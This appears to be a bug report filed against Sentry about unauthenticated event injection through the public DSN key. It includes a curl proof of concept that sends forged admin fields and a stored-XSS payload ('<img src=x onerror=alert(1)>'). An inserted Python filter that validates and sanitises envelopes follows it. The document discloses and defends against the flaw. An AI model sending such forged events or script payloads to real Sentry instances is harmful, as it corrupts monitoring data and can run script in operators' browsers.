Open
Description
### Environment
SaaS (https://sentry.io/)
### Steps to Reproduce
- Open the public Sentry login page at: https://xxxx/auth/login/sentry/
- Open browser DevTools → Network tab
- Find a POST request to: `/api/1/envelope/?sentry_key=...`
- Extract the `sentry_key` from the URL (visible even without authentication)
- Craft a POST request like below using `curl` or Burp Suite:

```shell
curl -X POST 'https://xxxx/api/1/envelope/?sentry_version=7&sentry_key=<exposed-key>' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  --data-binary $'{"event_id":"1234567890abcdef1234567890abcdef","sent_at":"2025-10-08T07:00:00Z","sdk":{"name":"sentry.javascript.react","version":"10.11.0"}}\n{"type":"event"}\n{"timestamp":"2025-10-08T07:00:00Z","platform":"javascript","message":"Unauthenticated fake injection","user":{"username":"attacker","isadmin":true},"tags":{"role":"admin"},"extra":{"alert":"<img src=x onerror=alert(1)>"} }'
```
### Expected Result
Only authenticated and trusted clients should be able to submit events that generate issues in the dashboard.
`/api/1/envelope/` should:
- Validate DSN + origin
- Reject unauthenticated requests
- Sanitize unknown fields (like `isadmin`, `alert`)
- Not accept forged log data that leads to security bypass or UI injection
### Actual Result
- Any unauthenticated user can extract the public DSN just by visiting the login page
- That DSN allows direct POST to `/api/1/envelope/` without authentication
- Events are accepted and processed, showing up as real issues in the dashboard
- No checks on fields like `user.isadmin`, `tags.role`, `extra.alert`
- Potential for stored XSS via unescaped values in `extra.alert`
### Product Area
APIs
### Link
_No response_
### DSN
_No response_
### Version
25.9.0 - 8c4f6a7
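The report's "Expected Result" lists what an ingest endpoint should do with an envelope: check the key and origin, drop client-asserted privilege fields such as `user.isadmin` and `tags.role`, and neutralise markup in free-text values before they reach a dashboard. The following is an added, standalone illustration of those server-side checks; it is not Sentry's code and not part of the report. The public key, allowed origin, field deny-lists and the sample envelope are constructed placeholders, and the envelope parser handles only the single-event, three-line shape used in the report.

```python
"""Defensive filter for Sentry-style envelope submissions (added example, not Sentry's code)."""
import html
import json
import secrets
from typing import Any, Optional
from urllib.parse import parse_qs

# Constructed project configuration (hypothetical values, not a real DSN key).
PROJECT_PUBLIC_KEY = "0123456789abcdef0123456789abcdef"
ALLOWED_ORIGINS = {"https://app.example.com"}

# user.* keys a client SDK must never be allowed to assert about itself (assumed list).
PRIVILEGED_USER_KEYS = {"isadmin", "is_admin", "admin", "role", "roles", "permissions"}
# tag keys reserved for server-side assignment (assumed list).
RESERVED_TAG_KEYS = {"role"}


def check_auth(query_string: str, origin: Optional[str]) -> list:
    """Return the reasons to reject the request; an empty list means it may proceed."""
    reasons = []
    key = parse_qs(query_string).get("sentry_key", [""])[0]
    # Constant-time comparison so the key check does not leak through timing.
    if not secrets.compare_digest(key.encode(), PROJECT_PUBLIC_KEY.encode()):
        reasons.append("unknown sentry_key")
    if origin is None or origin not in ALLOWED_ORIGINS:
        reasons.append(f"origin not allowed: {origin!r}")
    return reasons


def parse_envelope(body: str) -> tuple:
    """Split a newline-delimited envelope into (envelope header, item header, payload)."""
    lines = [ln for ln in body.split("\n") if ln.strip()]
    if len(lines) != 3:
        raise ValueError(f"expected 3 envelope lines, got {len(lines)}")
    header, item, payload = (json.loads(ln) for ln in lines)
    if item.get("type") != "event":
        raise ValueError(f"unsupported item type: {item.get('type')!r}")
    return header, item, payload


def _escape_strings(value: Any) -> Any:
    """Recursively HTML-escape every string so nothing renders as markup downstream."""
    if isinstance(value, str):
        return html.escape(value, quote=True)
    if isinstance(value, dict):
        return {k: _escape_strings(v) for k, v in value.items()}
    if isinstance(value, list):
        return [_escape_strings(v) for v in value]
    return value


def sanitize_event(event: dict) -> tuple:
    """Drop client-asserted privilege fields and escape free text; report what was dropped."""
    dropped = []
    clean = dict(event)
    user = dict(clean.get("user") or {})
    for key in list(user):
        if key.lower() in PRIVILEGED_USER_KEYS:
            dropped.append(f"user.{key}")
            del user[key]
    clean["user"] = user
    tags = dict(clean.get("tags") or {})
    for key in list(tags):
        if key.lower() in RESERVED_TAG_KEYS:
            dropped.append(f"tags.{key}")
            del tags[key]
    clean["tags"] = tags
    for field in ("message", "extra", "tags", "user"):
        if field in clean:
            clean[field] = _escape_strings(clean[field])
    return clean, dropped


def ingest(query_string: str, origin: Optional[str], body: str) -> dict:
    """Full pipeline: auth -> parse -> sanitize. Returns a decision record."""
    reasons = check_auth(query_string, origin)
    if reasons:
        return {"accepted": False, "reasons": reasons, "event": None, "dropped": []}
    try:
        _header, _item, payload = parse_envelope(body)
    except (ValueError, json.JSONDecodeError) as exc:
        return {"accepted": False, "reasons": [f"malformed envelope: {exc}"], "event": None, "dropped": []}
    event, dropped = sanitize_event(payload)
    return {"accepted": True, "reasons": [], "event": event, "dropped": dropped}


# Constructed sample envelope shaped like the one in the report (placeholder values).
SAMPLE_BODY = "\n".join([
    json.dumps({"event_id": "0" * 32, "sent_at": "2025-10-08T07:00:00Z",
                "sdk": {"name": "sentry.javascript.react", "version": "10.11.0"}}),
    json.dumps({"type": "event"}),
    json.dumps({"timestamp": "2025-10-08T07:00:00Z", "platform": "javascript",
                "message": "sample", "user": {"username": "someone", "isadmin": True},
                "tags": {"role": "admin"}, "extra": {"alert": "<img src=x onerror=alert(1)>"}}),
])

if __name__ == "__main__":
    print(json.dumps(ingest(f"sentry_version=7&sentry_key={PROJECT_PUBLIC_KEY}",
                            "https://app.example.com", SAMPLE_BODY), indent=2))
```

Run the module to see the decision record for the sample envelope: the key and origin pass, `user.isadmin` and `tags.role` are stripped and listed under `dropped`, and the `extra.alert` value is returned HTML-escaped. A wrong key or an origin outside the allowlist is rejected before the body is parsed, and a malformed body is rejected before anything is sanitized.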
Metadata
Status
Waiting for: Support